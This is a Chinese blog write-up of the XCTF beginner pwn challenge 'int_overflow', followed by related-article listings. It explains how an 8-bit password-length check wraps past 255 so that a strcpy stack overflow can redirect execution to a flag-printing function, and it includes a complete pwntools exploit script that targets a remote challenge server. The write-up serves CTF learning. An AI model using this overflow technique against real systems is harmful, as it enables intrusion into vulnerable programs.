int_overflow

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量398 收藏
点赞数 2
分类专栏: 攻防世界pwn新手区 文章标签: python 信息安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45846085/article/details/117226365
版权

1.程序检查

在这里插入图片描述
下载附件,checksec一下检查文件保护
在这里插入图片描述
只打开了NX保护,栈不可以执行
在这里插入图片描述

运行一下程序,整个程序功能就是输入一个名字和密码
在这里插入图片描述
查看一下程序当中引用的字符串,我们发现了一个cat flag

2.流程分析

在这里插入图片描述
使用神器IDA ,查看程序整体逻辑。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
ida当中搜索字符串找到what_is_this函数中cat flag,我们的目标就是控制程序去执行,what_is_this这个函数。

这里程序的漏洞很明显strcpy是可以栈溢出的地方在这里插入图片描述
在这里插入图片描述
这边我们就可以进行栈溢出。

但是这个程序有一个密码长度检查,那么如何绕过呢?

在这里插入图片描述

这边我们v3是一个无符号的整形,它的表示范围是0~255。这边整形溢出就可以顺利绕过这个密码检查。密码长度范围在3-8,所以密码长度:255+1+3 > 14h+len(ebp)+ len(ret addre)=28
最后exp如下:

3.exp编写

from pwn import *
p = remote("60.208.127.90 ",26659 )
#p = process('int_overflow')
context(os = 'linux',arch = 'i386',log_level = 'debug')
cat_flag_addr = 0x0804868B
p.sendlineafter("Your choice:", "1")

p.sendlineafter("your username:", "kk")
p.recvuntil("your passwd:")
payload = "a" * 0x14 + "aaaa" + p32(cat_flag_addr)+"a"*234
p.sendline(payload)

p.recv()
p.interactive()
b0ck
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
C语言int和float的存储和溢出(overflow)
wormhole07
02-28 2176
首先给出编译器版本 cc 可以用来替代 gcc 或 clang 命令。 cc -v Apple clang version 11.0.0 (clang-1100.0.33.8) Target: x86_64-apple-darwin19.3.0 此版本下的各个数据类型长度 size of int: 4 bytes size of float: 4 bytes size of double: 8 ...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2628
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
CTF PWN-攻防世界Overflow整数溢出漏洞
最新发布
道阻且长,行则将至。
07-29 1457
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
int_overflow(xctf)
weixin_43868725的博客
05-06 564
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 398
[攻防世界]int_overflow巨细
PWN做题笔记2-int_overflow(已校对)
qq_40923256的博客
04-19 232
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1 如图,程序是一个32位ELF文件 chesec ida反编译,main方法中实现了登录功能,无溢出点 login方法中输入用户名和密码: 这里位数上0x19<40,0x199<512,因此无溢出 check_passwd实现对密码长度进行检查: 密...
WDT_overflow_int.rar_arm aic 中断_lpc22
09-20
标题“WDT_overflow_int.rar_arm aic 中断_lpc22”指的是一个与ARM处理器相关的中断事件,具体来说是看门狗定时器(Watchdog Timer, WDT)溢出中断。看门狗定时器是一种安全机制,用于防止系统因程序故障或死锁而...
int_1ms_test.rar_Mega2560 中断_mega_mega 2560
09-14
"int_1ms_test"项目是关于创建一个每1毫秒触发一次中断的示例。在Arduino环境下,我们可以使用` attachInterrupt()`函数来设置中断。该函数需要三个参数:中断引脚号、中断模式和中断服务函数的指针。在MEGA 2560上...
overflow_数值溢出_
10-02
这里的"overflow_数值溢出_"标题指的是当一个数值运算的结果超过了可表示的最大范围,导致数据丢失或错误的情况。这种现象在计算机科学中是相当重要的,因为它可能导致程序崩溃、结果不准确或者产生未预期的行为。 ...
Android用PopupWindow实现自定义overflow
09-01
在本教程中,我们将讨论如何利用 `PopupWindow` 来实现自定义的 overflow 功能,类似于 Android Action Bar 中的 "更多选项" 菜单。 首先,overflow 菜单通常用于在屏幕空间有限的情况下展示更多的操作选项。当 ...
debug int中断
04-18
例如,在 Windows2000 中的 DOS 方式下,我们可以使用 int 0 指令来调用 0 号中断处理程序,该程序的功能是显示“Divide overflow”,然后返回系统。 编写中断例程 我们可以编写自己的中断例程供应用程序调用。...
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 942
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
int_overflow的WP(整数溢出)
WangLal的博客
02-14 272
攻防世界PWN int_overflow的WP 基本三步 checksec,file,执行文件 可以看出是个32位文件,且开了NX和RELRO。 之后扔到32位IDA pro 中查看 main函数看不到flag和溢出点,就每一个函数都看一下, 在下面这个函数看到了flag, 点击 what_is_this函数,得到函数地址0X804868B 在函数check—passwd,看起来好像有个溢出点,但不知道是什么溢出 看了一下其他大佬的WP,发现是整数溢出,有兴趣的,可以去这个博客看一下(https://
攻防世界 int_overflow
09-28 740
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
攻防世界-int_overflow
qq_45771413的博客
04-27 291
查看保护 IDA 先查看字符串搜索下有无可利用字符串,找到了cat flag。进入发现直接是system cat flag。看来只需要跳转到这个地址就可以了(0x8048694) 开始只能选择1.login登录,进入后提示输入用户名和密码。这里用户名限制死25位,没有操作空间,密码可以输入409位,插个眼。 最后还有个check passwd函数: 判断输入函数长度是否大于3小于8 然后将输入的密码拷贝给dest。 题目提示int_overstack,明晃晃地告诉我是整型溢出。我的关注重点就放在in
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2219
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
xctf学习之intoverflow
neuisf的博客
01-11 509
此题题目为intoverflow,提示整数溢出,IDA阅读伪代码,发现Success条件是输入password长度为[3,8),而要程序中有个函数what_is_this,功能是cat flag,所以要想获取flag,需要让程序运行此函数,而程序的运行并没有调用此函数,因此,必须溢出。存储输入password长度的变量是短整型,即8位二进制数,范围[0,255],当值大于255时,发生溢出,如25...
Int如何判断overflow
qq_41814546的博客
03-21 1685
int   int型的数值范围是 -2147483648~2147483647即32bit,范围总大小为2^32,那么如何通过判断一个整形是否(表示将会,作为整型它已经不能在int范围之外)overflow?解决办法:首先应从增长方式来看,拟定相应的算法进行判断 我在问题中遇到的增长方式是'添位':预测添位后的高位并且对末位单独判断,间接地使“未来”的整数判断是否overflow?if (res ...
int_overflow writeup
ditto的博客
01-06 917
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
TMR_INT_Overflow是定时器的什么中断类型
06-12
TMR_INT_Overflow是定时器溢出中断的类型,当定时器的计数器溢出时,就会产生这种中断。在定时器计数器达到最大值时,它会自动清零并触发溢出中断。如果在定时器溢出中断的处理程序中进行一些操作,例如更新计数器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值